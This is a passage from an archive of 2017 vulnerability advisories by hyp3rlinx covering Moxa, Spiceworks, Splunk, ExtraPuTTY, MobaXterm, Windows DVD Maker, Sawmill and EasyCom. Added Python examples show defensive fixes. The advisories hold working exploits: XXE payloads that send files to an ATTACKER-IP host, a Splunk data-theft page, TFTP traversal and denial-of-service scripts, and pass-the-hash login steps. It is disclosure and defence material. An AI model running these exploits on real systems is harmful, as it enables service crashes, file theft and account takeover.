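PEM_PRIVATE_KEY = re.compile(rb"-----BEGIN (?:RSA |EC |DSA |ENCRYPTED )?PRIVATE KEY-----")
# Extensions that conventionally hold private keys even when the content is not PEM.
KEY_LIKE_SUFFIXES = (".key", ".pfx", ".p12")


def find_exposed_private_keys(webroot: str, head_bytes: int = 4096) -> List[str]:
    """Walk a directory that is served over HTTP and list files holding private keys.

    A file is reported when its first bytes carry a PEM private-key header or its
    extension suggests key material. Certificates (BEGIN CERTIFICATE) are public
    and are not reported. Paths come back relative to webroot, sorted.
    """
    hits = []
    for dirpath, _dirnames, filenames in os.walk(webroot):
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                with open(full, "rb") as fh:
                    head = fh.read(head_bytes)
            except OSError:
                continue                      # unreadable files are skipped, not fatal
            if PEM_PRIVATE_KEY.search(head) or name.lower().endswith(KEY_LIKE_SUFFIXES):
                hits.append(os.path.relpath(full, webroot).replace(os.sep, "/"))
    return sorted(hits)


def build_sample_webroot() -> str:
    """Constructed layout mirroring web/certs/mxview.key beside ordinary static content.

    The key body is a placeholder string, not real key material."""
    root = tempfile.mkdtemp(prefix="mxview-web-")
    os.makedirs(os.path.join(root, "certs"))
    with open(os.path.join(root, "certs", "mxview.key"), "wb") as fh:
        fh.write(b"-----BEGIN PRIVATE KEY-----\nPLACEHOLDER-NOT-A-REAL-KEY\n-----END PRIVATE KEY-----\n")
    with open(os.path.join(root, "certs", "mxview.crt"), "wb") as fh:
        fh.write(b"-----BEGIN CERTIFICATE-----\nPLACEHOLDER\n-----END CERTIFICATE-----\n")
    with open(os.path.join(root, "index.html"), "wb") as fh:
        fh.write(b"<html><body>MXview</body></html>\n")
    return root


if __name__ == "__main__":
    sample = build_sample_webroot()
    print("private keys under", sample, "->", find_exposed_private_keys(sample))
```

Run against the real web directory (the advisory's ...\moxa\mxview\web), a non-empty result is the finding; the fix is to keep the key outside anything the web server maps to a URL.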




Network Access:
===
Remote




Severity:
=
Critical



Disclosure Timeline:
===
Vendor Notification:  March 5, 2017
Vendor confirms vulnerability : March 21, 2017
Vendor "updated firmware April 7, 2017" : March 29, 2017
April 9, 2017 : Public Disclosure




HYP3RLINX


CVE-2017-7457 Moxa MX AOPC-Server v1.5 XML External Entity Injection

2017-04-12 Thread hyp3rlinx
[+] Credits: John Page AKA HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MOXA-MX-AOPC-SERVER-v1.5-XML-EXTERNAL-ENTITY.txt
[+] ISR: ApparitionSec
 


Vendor:

www.moxa.com



Product:
===
MX-AOPC UA SERVER - 1.5

Moxa's MX-AOPC UA Suite is the first OPC UA server for industrial automation 
supporting both push and pull communication.



Vulnerability Type:
==
XML External Entity Injection



CVE Reference:
==
CVE-2017-7457



Security Issue:

XML External Entity injection via ".AOP" files used by MX-AOPC Server results in
remote file disclosure if a local user opens a specially crafted malicious
MX-AOPC Server file.



Exploit/POC:
=
Run MX-AOPC UA Server / Runtime / Start Server Runtime Service

a) ATTACKER SERVER LISTENER: as proof of concept we will read the Windows
msfmap.ini file
python -m SimpleHTTPServer 8080

"Evil.AOP" file

  

http://ATTACKER-IP:8080/payload.dtd;>
%dtd;]>



b) Evil "payload.dtd" file hosted on ATTACKER SERVER


http://ATTACKER-IP:8080?%file;'>">
%all;


e.g.

python -m SimpleHTTPServer 8080

Serving HTTP on 0.0.0.0 port 8080 ...

VICTIM-IP - - [02/Mar/2017 10:06:00] "GET /payload.dtd HTTP/1.1" 200 -
VICTIM-IP - - [02/Mar/2017 10:06:00] "GET /?;[connect%20name]%20will%20modify%20the%20connection%20if%20ADC.connect="name";[connect%20default]%20will%20modify%20the%20connection%20if%20name%20is%20not%20found;[sql%20name]%20will%20modify%20the%20Sql%20if%20ADC.sql="name(args)";[sql%20default]%20will%20modify%20the%20Sql%20if%20name%20is%20not%20found;Override%20strings:%20Connect,%20UserId,%20Password,%20Sql.;Only%20the%20Sql%20strings%20support%20parameters%20using%20"?";The%20override%20strings%20must%20not%20equal%20""%20or%20they%20are%20ignored;A%20Sql%20entry%20must%20exist%20in%20each%20sql%20section%20or%20the%20section%20is%20ignored;An%20Access%20entry%20must%20exist%20in%20each%20connect%20section%20or%20the%20section%20is%20ignored;Access=NoAccess;Access=ReadOnly;Access=ReadWrite;[userlist%20name]%20allows%20specific%20users%20to%20have%20special%20access;The%20Access%20is%20computed%20as%20follows:;%20%20(1)%20First%20take%20the%20access%20of%20the%20connect%20section.;%20%20(2)%20If%20a%20user%20entry%20is%20found,%20it%20will%20override.[connect%20default];If%20we%20want%20to%20disable%20unknown%20connect%20values,%20we%20set%20Access%20to%20NoAccessAccess=NoAccess[sql%20default];If%20we%20want%20to%20disable%20unknown%20sql%20values,%20we%20set%20Sql%20to%20an%20invalid%20query.Sql="%20"[connect%20CustomerDatabase]Access=ReadWriteConnect="DSN=AdvWorks"[sql%20CustomerById]Sql="SELECT%20*%20FROM%20Customers%20WHERE%20CustomerID%20=%20?"[connect%20AuthorDatabase]Access=ReadOnlyConnect="DSN=MyLibraryInfo;UID=MyUserID;PWD=MyPassword"[userlist%20AuthorDatabase]Administrator=ReadWrite[sql%20AuthorById]Sql="SELECT%20*%20FROM%20Authors%20WHERE%20au_id%20=%20?" HTTP/1.1" 200 -
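Added example, not Moxa's code: a Python check that lists every external entity an XML file declares without resolving any of them, and a loader that refuses such files, which is the property a project-file parser needs to avoid the exchange logged above. Both samples are constructed: the element names are invented rather than the real .AOP schema, and the malicious one reuses the remote DTD URL from the advisory together with a placeholder local file path.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat
from typing import List, Tuple


class ExternalEntityRejected(ValueError):
    """The document declares an entity that would be loaded from a URL or a file."""


def external_entities(data: bytes) -> List[Tuple[str, bool, str]]:
    """Return (name, is_parameter_entity, system_id) for every externally defined entity.

    Expat only reports the declarations here; it performs no file or network I/O
    on its own, so the DTD at http://ATTACKER-IP:8080/payload.dtd is never fetched
    during the scan. Malformed input is tolerated: whatever was declared before the
    error is still returned.
    """
    found: List[Tuple[str, bool, str]] = []
    parser = xml.parsers.expat.ParserCreate()

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation_name):
        # An internal entity has a value and no identifiers; anything with a
        # SYSTEM or PUBLIC identifier would be resolved from outside the document.
        if system_id is not None or public_id is not None:
            found.append((name, bool(is_param), system_id or ""))

    parser.EntityDeclHandler = on_entity_decl
    try:
        parser.Parse(data, True)
    except xml.parsers.expat.ExpatError:
        pass
    return found


def load_project_file(data: bytes) -> ET.Element:
    """Parse a project file only if it carries no external entity declarations."""
    externals = external_entities(data)
    if externals:
        detail = ", ".join(f"%{n};" if p else f"&{n};" for n, p, _ in externals)
        raise ExternalEntityRejected(f"refusing document with external entities: {detail}")
    return ET.fromstring(data)


# Constructed samples. The malicious one rebuilds the declaration pattern from the
# advisory's fragments: a parameter entity for a local file and one for a remote
# DTD, then a reference that would pull the remote DTD in. The local path is a
# placeholder, and <AOPProject>/<Server> are invented element names.
MALICIOUS_AOP = b"""<?xml version="1.0"?>
<!DOCTYPE AOPProject [
<!ENTITY % file SYSTEM "file:///C:/example/local-file.ini">
<!ENTITY % dtd SYSTEM "http://ATTACKER-IP:8080/payload.dtd">
%dtd;
]>
<AOPProject><Server name="demo"/></AOPProject>
"""

BENIGN_AOP = b"""<?xml version="1.0"?>
<AOPProject><Server name="demo"/></AOPProject>
"""

if __name__ == "__main__":
    print("benign   ->", load_project_file(BENIGN_AOP).tag)
    try:
        load_project_file(MALICIOUS_AOP)
    except ExternalEntityRejected as exc:
        print("malicious->", exc)
```

Rejecting outright is simpler and safer than trying to sanitise: a format like this has no legitimate use for entities that point outside the file.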



Network Access:
===
Remote



Severity:
=
High



Disclosure Timeline:
==
Vendor Notification:  March 5, 2017
Vendor confirms vulnerability : March 21, 2017
Vendor "updated firmware April 7, 2017" : March 29, 2017
April 9, 2017 : Public Disclosure




hyp3rlinx


Spiceworks 7.5 TFTP Improper Access Control File Overwrite / Upload

2017-04-06 Thread hyp3rlinx
[+] Credits: John Page AKA HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/SPICEWORKS-IMPROPER-ACCESS-CONTROL-FILE-OVERWRITE.txt
[+] ISR: APPARITIONSEC  
 


Vendor:
==
www.spiceworks.com



Product:
=
Spiceworks - 7.5


Provides network inventory and monitoring of all the devices on the network by 
discovering IP-addressable devices.
It can be configured to provide custom alerts and notifications based on 
various criteria. It also provides a ticketing system,
a user portal, an integrated knowledge base, and mobile ticket management.



Vulnerability Type:
==
Improper Access Control File Overwrite / Upload



CVE Reference:
==
CVE-2017-7237



Security Issue:

The Spiceworks TFTP Server, as distributed with Spiceworks Inventory 7.5, 
allows remote attackers to access the Spiceworks "data\configurations"
directory by leveraging the unauthenticated nature of the TFTP service for all 
clients who can reach UDP port 69. This allows remote attackers to
overwrite files within the Spiceworks configurations directory, if the targeted 
file name is known or guessed.

Remote attackers who can reach UDP port 69 can also write/upload arbitrary 
files to "data\configurations". This can potentially become a
Remote Code Execution vulnerability if, for example, an executable file (EXE, 
BAT) is dropped and later accessed and run by an unknowing
Spiceworks user.




References - released April 3, 2017:

https://community.spiceworks.com/support/inventory/docs/network-config#security



Proof:
===

1) Install Spiceworks 
2) c:\>tftp -i VICTIM-IP PUT someconfig someconfig
3) Original someconfig gets overwritten

OR

Arbitrary file upload
c:\>tftp -i VICTIM-IP PUT Evil.exe  Evil.exe




Network Access:
===
Remote




Severity:
=
High




Disclosure Timeline:
==
Vendor Notification: March 13, 2017
Sent vendor e.g. POC : March 23, 2017
Request status : March 30, 2017
Vendor reply: "We are still working on this" March 30, 2017
Vendor reply :"Thanks for bringing this to our attention"
and releases basic security note of issue on website : April 3, 2017
April 5, 2017  : Public Disclosure





HYP3RLINX


Splunk Enterprise Information Theft CVE-2017-5607

2017-04-03 Thread hyp3rlinx
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/SPLUNK-ENTERPRISE-INFORMATION-THEFT.txt
[+] ISR: ApparitionSec
 


Vendor:
===
www.splunk.com



Product:
==
Splunk Enterprise 


Splunk provides the leading platform for Operational Intelligence. Customers 
use Splunk to search, monitor, analyze
and visualize machine data. Splunk Enterprise collects and analyzes high 
volumes of machine-generated data.



Vulnerability Type:
==
Javascript (JSON) Information Theft



CVE Reference:
==
CVE-2017-5607



Security Issue:

Attackers can siphon information from Splunk Enterprise if an authenticated 
Splunk user visits a malicious webpage.
Some useful data gained is the currently logged-in username and whether the 
remote user setting is enabled. The username
can then be used to phish or brute force the Splunk Enterprise login. Additional 
information stolen may aid in furthering attacks.

The root cause is that the config?autoload=1 response assigns its data to the 
global Window JS variable '$C'.

e.g.

window.$C = {"BUILD_NUMBER": 207789, "SPLUNKD_PATH"... etc... }

To steal the information we can simply define a function to be called when the '$C' 
JS property is "set" on the webpage, for example:
Object.defineProperty( Object.prototype, "$C", { set:function(val){...

Object.prototype is the object that every other object inherits from in 
JavaScript; if we create a setter under the name of our target,
in this case "$C", we can get/steal the value of this data. In this case it is 
very easy because the data is assigned in the global Window namespace.


Affected Splunk Enterprise versions:
6.5.x before 6.5.3
6.4.x before 6.4.6
6.3.x before 6.3.10
6.2.x before 6.2.13.1
6.1.x before 6.1.13
6.0.x before 6.0.14
5.0.x before 5.0.18 and Splunk Light before 6.5.2

Vulnerability could allow a remote attacker to obtain logged-in username and 
Splunk version-related information via JavaScript.


References:
=
https://www.splunk.com/view/SP-CAAAPZ3
https://www.splunk.com/view/SP-CAAAPZ3#InformationLeakageviaJavaScriptCVE20175607



Exploit/POC:
=

Reproduction:

1) Log into Splunk
2) Place the JavaScript below in a webpage on another server.

"Splunk-Data-Theft.html"  


<script>
Object.defineProperty( Object.prototype, "$C", { set:function(val){
    //prompt("Splunk Timed out:\nPlease Login to Splunk\nUsername: "+val.USERNAME, "Password")
    for(var i in val){
        alert(""+i+" "+val[i]);
    }
  }
});
</script>

<script src="https://VICTIM-IP:8000/en-US/config?autoload=1"></script>


3) Visit the server hosting the "Splunk-Data-Theft.html" webpage, grab current 
authenticated user
4) Phish or brute force the application.



Video POC URL:
===
https://vimeo.com/210634562



Network Access:
===
Remote



Impact:
===
Information Disclosure



Severity:
=
Medium



Disclosure Timeline:
===
Vendor Notification:  November 30, 2016
Vendor Acknowledgement: December 2, 2016
Vendor Release Splunk 6.5.3 / Patch : March 30, 2017
March 31, 2017  : Public Disclosure




hyp3rlinx


CVE-2017-7183 ExtraPuTTY v029_RC2 TFTP Denial Of Service

2017-03-20 Thread hyp3rlinx
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/EXTRAPUTTY-TFTP-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec
 


Vendor:
==
www.extraputty.com



Product:
==
ExtraPuTTY - v029_RC2
hash: d7212fb5bc4144ef895618187f532773

Also Vulnerable: v0.30 r15
hash: eac63550f837a98d5d52d0a19d938b91

ExtraPuTTY is a fork of PuTTY version 0.67.
ExtraPuTTY has all the features of the original software and adds others.

Below is a short list of the principal features (see all features):
DLL frontend
TestStand API ( LabWindows ,TestStand 2012)
timestamp
StatusBar
Scripting a session with lua 5.3.
Automatic sequencing of commands.
Shortcuts for pre-defined commands.
Keyboard shortcuts for pre-defined command
Portability (use of directories structure)
Integrates FTP, TFTP, SCP, SFTP, Ymodem, Xmodem transfer protocols
Integrates PuTTYcyg,PuTTYSC, HyperLink, zmodem and session manager projects
Change default settings from configuration file
Change putty settings during session
PuTTYcmdSender : tool to send command or keyboard shortcut to multiple putty 
windows


Vulnerability Type:
===
TFTP Denial of Service



CVE Reference:
==
CVE-2017-7183



Security Issue:

The TFTP server component of ExtraPuTTY is vulnerable to a remote Denial of Service 
attack triggered by sending large junk UDP
TFTP Read/Write request packets.

Open the ExtraPuTTY Session Manager, select Files Transfer => TFTP Server, then run 
the Python exploit below.

Then, BOOM

(100c.30c): Access violation - code c005 (first/second chance not available)
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for 
kernel32.dll - 
eax= ebx=0929ee98 ecx=0174 edx=7efefeff esi=0002 edi=
eip=77b4015d esp=0929ee48 ebp=0929eee4 iopl=0 nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=0246
ntdll!ZwWaitForMultipleObjects+0x15:



Exploit/POC:
=
import socket

print "ExtraPuTTY v029_RC2 TFTP Server"
print "Remote Denial Of Service 0day Exploit"
print "John Page AKA hyp3rlinx\n"

TARGET=raw_input("[IP]>")
TYPE=int(raw_input("[Select DOS Type: Read=1, Write=2]>"))
CRASH="A"*2000          # oversized filename field
PORT = 69

if TYPE==1:
    PAYLOAD = "\x00\x01"        # TFTP read request (RRQ) opcode
    PAYLOAD += CRASH + "\x00"   # filename, NUL terminated
    PAYLOAD += "netascii\x00"   # transfer mode, NUL terminated
elif TYPE==2:
    PAYLOAD = "\x00\x02"        # TFTP write request (WRQ) opcode
    PAYLOAD += CRASH + "\x00"
    PAYLOAD += "netascii\x00"
else:
    raise SystemExit("Unknown DOS type")

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
    # small well-formed read request first, to check that the server answers
    s.sendto("\x00\x01TEST\x00netascii\x00", (TARGET, PORT))
    recv = s.recvfrom(255)
    if recv != None:
        print "Crashing ExtraPuTTY TFTP server at : %s" %(TARGET)
        s.sendto(PAYLOAD, (TARGET, PORT))
except Exception:
    print 'Server not avail, try later'
s.close()





Network Access:
===
Remote



Severity:
=
Medium



Disclosure Timeline:
===
Vendor Notification:  No reply
March 20, 2017 : Public Disclosure




hyp3rlinx


CVE-2017-6805 MobaXterm Personal Edition v9.4 Path Traversal Remote File Disclosure

2017-03-16 Thread hyp3rlinx
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: 
http://hyp3rlinx.altervista.org/advisories/MOBAXTERM-TFTP-PATH-TRAVERSAL-REMOTE-FILE-ACCESS.txt
[+] ISR: ApparitionSec

Vendor:
=
mobaxterm.mobatek.net

Product:
===
MobaXterm Personal Edition v9.4

Enhanced terminal for Windows with X11 server, tabbed SSH client, network tools 
and much more.

Vulnerability Type:
=
Path Traversal Remote File Disclosure

CVE Reference:
==
CVE-2017-6805

Security Issue:

Remote attackers can use a UDP socket connection to the TFTP server on port 69 and send 
a Read request to retrieve otherwise protected files using
directory traversal, e.g. ../../../../Windows/system.ini

Start the MobaXterm TFTP server, which listens on the default TFTP port 69.

c:\>tftp -i 127.0.0.1 GET ../../../../Windows/system.ini
Transfer successful: 219 bytes in 1 second(s), 219 bytes/s

c:\xampp\htdocs>type system.ini
; for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON

[drivers]
wave=mmdrv.dll
timer=timer.drv

[mci]

Victim Data located on: 127.0.0.1

POC URL:
=
https://vimeo.com/207516364

Exploit:
==

import sys,socket

print 'MobaXterm TFTP Directory Traversal 0day Exploit'
print 'Read Windows/system.ini'
print 'hyp3rlinx \n'

HOST = raw_input("[IP]>")
FILE = 'Windows/system.ini'
PORT = 69

PAYLOAD = "\x00\x01" #TFTP Read
PAYLOAD += "../" * 4 + FILE + "\x00" #Read system.ini using directory traversal
PAYLOAD += "netascii\x00" #TFTP Type

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(PAYLOAD, (HOST, PORT))
out = s.recv(1024)
s.close()

print "Victim Data located on : %s " %(HOST)
print out.strip()
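
The three TFTP advisories on this page (Spiceworks accepting unauthenticated writes into its configuration directory, ExtraPuTTY crashing on oversized requests, MobaXterm honouring "../" in read requests) share one root cause: the server trusts the opcode, filename and mode fields of an RFC 1350 request as received. The following added example, which is not code from any of these vendors or from the advisories' PoCs, parses a raw RRQ/WRQ and refuses each of those abuses before the filesystem is touched; the served root, size limits and sample packets are constructed for the demonstration.

```python
import os
import struct

# RFC 1350 request opcodes and transfer modes
OP_RRQ, OP_WRQ = 1, 2
MODES = {b"netascii", b"octet"}
MAX_REQUEST = 512    # assumption: a request should never exceed one TFTP block
MAX_FILENAME = 255   # assumption: matches common filesystem name limits

# Constructed sample requests (not captured traffic); the traversal and junk
# packets mirror the shapes described in the MobaXterm and ExtraPuTTY advisories.
RRQ_OK = b"\x00\x01system.ini\x00netascii\x00"
RRQ_TRAVERSAL = b"\x00\x01" + b"../" * 4 + b"Windows/system.ini\x00netascii\x00"
RRQ_JUNK = b"\x00\x01" + b"A" * 2000 + b"\x00netascii\x00"
WRQ_CONFIG = b"\x00\x02someconfig\x00octet\x00"


class TftpRequestError(ValueError):
    """Any request the server must refuse (answered with a TFTP ERROR packet, never a crash)."""


def parse_request(packet: bytes):
    """Parse an RRQ/WRQ into (opcode, filename, mode), refusing malformed input up front."""
    if len(packet) > MAX_REQUEST:
        raise TftpRequestError("oversized request")
    if len(packet) < 4:
        raise TftpRequestError("truncated request")
    (opcode,) = struct.unpack("!H", packet[:2])
    if opcode not in (OP_RRQ, OP_WRQ):
        raise TftpRequestError("not a read/write request")
    # Body is filename NUL mode NUL [options...]; the final NUL yields a trailing empty field.
    fields = packet[2:].split(b"\x00")
    if len(fields) < 3 or not fields[0] or not fields[1]:
        raise TftpRequestError("malformed request fields")
    filename, mode = fields[0], fields[1].lower()
    if len(filename) > MAX_FILENAME:
        raise TftpRequestError("filename too long")
    if mode not in MODES:
        raise TftpRequestError("unknown transfer mode")
    try:
        return opcode, filename.decode("ascii"), mode.decode("ascii")
    except UnicodeDecodeError:
        raise TftpRequestError("non-ASCII filename") from None


def resolve_in_root(root: str, filename: str) -> str:
    """Map the requested name onto the served tree; anything that escapes root is refused."""
    root = os.path.realpath(root)
    # Normalise both separator styles so "..\\..\\" is caught on every platform,
    # and strip a leading slash so absolute names are still anchored under root.
    relative = filename.replace("\\", "/").lstrip("/")
    candidate = os.path.realpath(os.path.join(root, relative))
    if os.path.commonpath([root, candidate]) != root:
        raise TftpRequestError("path escapes served directory")
    return candidate


def authorize(packet: bytes, root: str, allow_write: bool = False):
    """Parse, confine to root, and deny writes unless the operator enabled them."""
    opcode, filename, mode = parse_request(packet)
    path = resolve_in_root(root, filename)
    if opcode == OP_WRQ and not allow_write:
        raise TftpRequestError("writes disabled")
    return opcode, path, mode


def verdict(packet: bytes, root: str, allow_write: bool = False):
    """Return None when the request would be served, otherwise the refusal reason."""
    try:
        authorize(packet, root, allow_write)
    except TftpRequestError as err:
        return str(err)
    return None


if __name__ == "__main__":
    for label, pkt in [("ok", RRQ_OK), ("traversal", RRQ_TRAVERSAL),
                       ("junk", RRQ_JUNK), ("write", WRQ_CONFIG)]:
        print(label, verdict(pkt, "/srv/tftp") or "served")
```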

Network Access:
===
Remote

Severity:
=
High

Disclosure Timeline:
=
Vendor Notification: No Reply
March 10, 2017 : Public Disclosure


hyp3rlinx




CVE-2017-0045 Windows DVD Maker XML External Entity File Disclosure

2017-03-15 Thread hyp3rlinx
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-DVD-MAKER-XML-EXTERNAL-ENTITY-FILE-DISCLOSURE.txt
[+] ISR: ApparitionSec



Vendor:
=
www.microsoft.com



Product:
=
Windows DVD Maker 
v6.1.7

Windows DVD Maker is a feature you can use to make DVDs that you can watch on a 
computer or on a TV using a regular DVD player. 



Vulnerability Type:
=
XML External Entity Injection



CVE Reference:
==
CVE-2017-0045 
MS17-020



Security issue:

Windows DVD Maker project ".msdvd" files are prone to XML External Entity 
attacks, allowing remote attackers to gain access
to files from a victim's computer using a specially crafted malicious .msdvd 
file, resulting in remote information / file disclosure. 


POC URL:
=
https://vimeo.com/208383182


References:

https://technet.microsoft.com/library/security/MS17-020
https://support.microsoft.com/en-us/help/3208223/ms17-020-security-update-for-windows-dvd-maker-march-14-2017

Applies to:

Windows Server 2008 R2 Service Pack 1
Windows Server 2008 R2 Datacenter
Windows Server 2008 R2 Enterprise
Windows Server 2008 R2 Standard
Windows Web Server 2008 R2
Windows Server 2008 R2 Foundation
Windows 7 Service Pack 1
Windows 7 Ultimate
Windows 7 Enterprise
Windows 7 Professional
Windows 7 Home Premium
Windows 7 Home Basic
Windows 7 Starter
Windows Server 2008 Service Pack 2
Windows Server 2008 Foundation
Windows Server 2008 Standard
Windows Server 2008 for Itanium-Based Systems
Windows Web Server 2008
Windows Server 2008 Enterprise
Windows Server 2008 Datacenter
Windows Vista Service Pack 2
Windows Vista Home Basic
Windows Vista Home Premium
Windows Vista Business
Windows Vista Ultimate
Windows Vista Enterprise
Windows Vista Starter



Exploit code(s):
===
Steal XAMPP Web Servers private key "server.key".

1) python -m SimpleHTTPServer 8080 (listens on ATTACKER-IP, hosts payload.dtd)


2) "payload.dtd"



http://ATTACKER-IP:8080?%file;'>">

%all;



3) "Evil.msdvd" 



http://ATTACKER-IP:8080/payload.dtd;>
%dtd;]>



RESULT:
XAMPP Web Server private key sent to attacker:

e.g.

C:\>python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...

127.0.0.1 - - [13/Mar/2017 23:53:36] "GET /payload.dtd HTTP/1.1" 200 -




Disclosure Timeline:
=
Vendor Notification: September 3, 2016
Vendor acknowledgement: November 17, 2016
March 14, 2017 : Vendor released MS17-020
March 15, 2017 : Public Disclosure



Network access:
=
Remote



Severity:
===
High




Sawmill Enterprise v8.7.9 Pass The Hash Authentication Bypass

2017-03-06 Thread hyp3rlinx
[+] Credits: John Page AKA Hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/SAWMILL-PASS-THE-HASH-AUTHENTICATION-BYPASS.txt
[+] ISR: ApparitionSec  



Vendor:
===
www.sawmill.net



Product:

Sawmill Enterprise v8.7.9

sawmill8.7.9.4_x86_windows.exe
hash: b7ec7bc98c42c4908dfc50450b4521d0

Sawmill is a powerful hierarchical log analysis tool that runs on every major 
platform.


Vulnerability Type:
===
Pass the Hash Authentication Bypass



CVE Reference:
==
CVE-2017-5496



Security Issue:
=
Sawmill suffers from a classic "Pass The Hash" vulnerability whereby an 
attacker who gains access to the hashed user account passwords
can log in to the Sawmill interface using the raw MD5 hash values, allowing 
attackers to bypass the work of offline cracking of
account password hashes.


This issue is usually known to affect Windows systems, e.g. (NT Pass the 
Hash / SecurityFocus, 1997). However, this vulnerability can also
present itself in a vulnerable web application. 

Sawmill account password hashes are stored under LogAnalysisInfo/ directory in 
"users.cfg".

e.g.

users = {
  root_admin = {
username = "admin"
password_checksum = "e99a18c428cb38d5f260853678922e03"
email_address = ""


This config file is stored local to the Sawmill application. However, if an 
attacker gains access to a backup of the config that is
stored in some other location that is then compromised, it can lead to 
subversion of Sawmill's authentication process.

Moreover, since the 'users.cfg' file is world readable, a regular non-Admin Windows 
user who logs into the system running Sawmill can grab
a password hash and easily log in to the vulnerable application without 
needing the password itself.


How to test?


With Sawmill running (default port 8988), log off Windows and switch to a "Standard" 
(non-Administrator) Windows user.

1) Open "users.cfg" under Sawmill's directory "C:\Program Files\Sawmill 
8\LogAnalysisInfo" and copy the root_admin Admin password hash.

2) Go to the Sawmill login page in a web browser, http://VICTIM-IP:8988/, enter 
the username 'admin' and the hash. Tada! You're Admin. 


Finally, Sawmill passwords are hashed using the weak MD5 algorithm with no 
salt.


e.g.

password: abc123
MD5 hash:
e99a18c428cb38d5f260853678922e03
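
What turns the stored checksum into a credential is that the login compares the value the client submits directly against the stored MD5. The added example below, which is not Sawmill's code, puts that pattern beside server-side verification that derives a salted PBKDF2 digest from the submitted password and compares it in constant time; the user record, iteration count and helper names are constructed for the demonstration, with the page's abc123 hash as the stored checksum.

```python
import hashlib
import hmac
import os

# Constructed record modelled on the users.cfg excerpt above; the checksum is MD5("abc123").
LEGACY_USER = {"username": "admin",
               "password_checksum": "e99a18c428cb38d5f260853678922e03"}


def legacy_login(user: dict, submitted: str) -> bool:
    """The pattern the advisory describes: whatever the client sends (the MD5 the
    login form computes) is string-compared to the stored checksum, so the stored
    hash is itself a valid credential and a leaked users.cfg can be replayed."""
    return submitted == user["password_checksum"]


def hardened_record(username: str, password: str, iterations: int = 100_000) -> dict:
    """Create a record with a random per-user salt and a slow, salted PBKDF2-HMAC digest."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"username": username, "salt": salt.hex(),
            "iterations": iterations, "digest": digest.hex()}


def hardened_login(user: dict, submitted_password: str) -> bool:
    """Re-derive the digest server-side from the submitted plaintext (sent over TLS)
    and compare in constant time; a leaked digest cannot be replayed because the
    server never accepts a digest as input."""
    actual = hashlib.pbkdf2_hmac("sha256", submitted_password.encode(),
                                 bytes.fromhex(user["salt"]), user["iterations"])
    return hmac.compare_digest(bytes.fromhex(user["digest"]), actual)


def hardened_roundtrip(password: str, attempt: str) -> bool:
    """Create a fresh hardened record for password and check attempt against it."""
    return hardened_login(hardened_record("admin", password), attempt)


if __name__ == "__main__":
    leaked = LEGACY_USER["password_checksum"]
    print("legacy login with leaked checksum:", legacy_login(LEGACY_USER, leaked))
    record = hardened_record("admin", "abc123")
    print("hardened login with password:", hardened_login(record, "abc123"))
    print("hardened login with leaked digest:", hardened_login(record, record["digest"]))
```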



Disclosure Timeline:
=
Vendor Notification: January 7, 2017
CVE-2017-5496 assigned : January 20
Request status : January 26
Vendor: Fix avail later in year still no ETA
Inform vendor public disclose date
February 18, 2017 : Public Disclosure



Network Access:
===
Remote



Impact:
==
Information Disclosure
Privilege Escalation



Severity Level:

High




Hyp3rlinx 


EasyCom SQL iPlug Denial Of Service

2017-03-06 Thread hyp3rlinx
[+] Credits: John Page AKA Hyp3rlinX
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/EASYCOM-SQL-IPLUG-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec


Vendor:

easycom-aura.com



Product:
===
SQL iPlug
EasycomPHP_4.0029.iC8im2.exe

SQL iPlug provides System i applications real-time access to heterogeneous and 
external databases
(Oracle, SQL Server, MySQL, MS Access, Sybase, Progress) in a completely 
transparent manner and without requiring replication.



Vulnerability Type:
===
Denial Of Service



CVE Reference:
==
CVE-2017-5359



Security Issue:

SQL iPlug listens on port 7078 by default. It suffers from a denial of service 
when an overly long string is sent via
HTTP requests in the "D$EVAL" parameter.



Exploit/POC:


import socket

print 'EasyCom SQL-IPLUG DOS 0day!'
print 'hyp3rlinx'

IP = raw_input("[IP]> ")
PORT = 7078 
payload="A"*43000

arr=[]      # keep every connection open so the server must hold them all
c=0
while 1:
    try:
        arr.append(socket.create_connection((IP,PORT)))
        arr[c].send('GET /?D$EVAL='+payload+" HTTP/1.1\r\n\r\n")
        c+=1
        print "doit!"
    except socket.error:
        print "[*] 5th ave 12:00"
        raw_input()
        break




Disclosure Timeline:
==
Vendor Notification: December 22, 2016
Vendor acknowledgement: December 23, 2016
Vendor Release Fix/Version February 20, 2017
February 22, 2017 : Public Disclosure




Network Access:
===
Remote



Severity:
===
Medium





hyp3rlinx


Ghostscript 9.20 Filename Command Execution

2017-02-01 Thread hyp3rlinx
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/GHOSTSCRIPT-FILENAME-COMMAND-EXECUTION.txt
[+] ISR: ApparitionSec
 


Vendor:
===
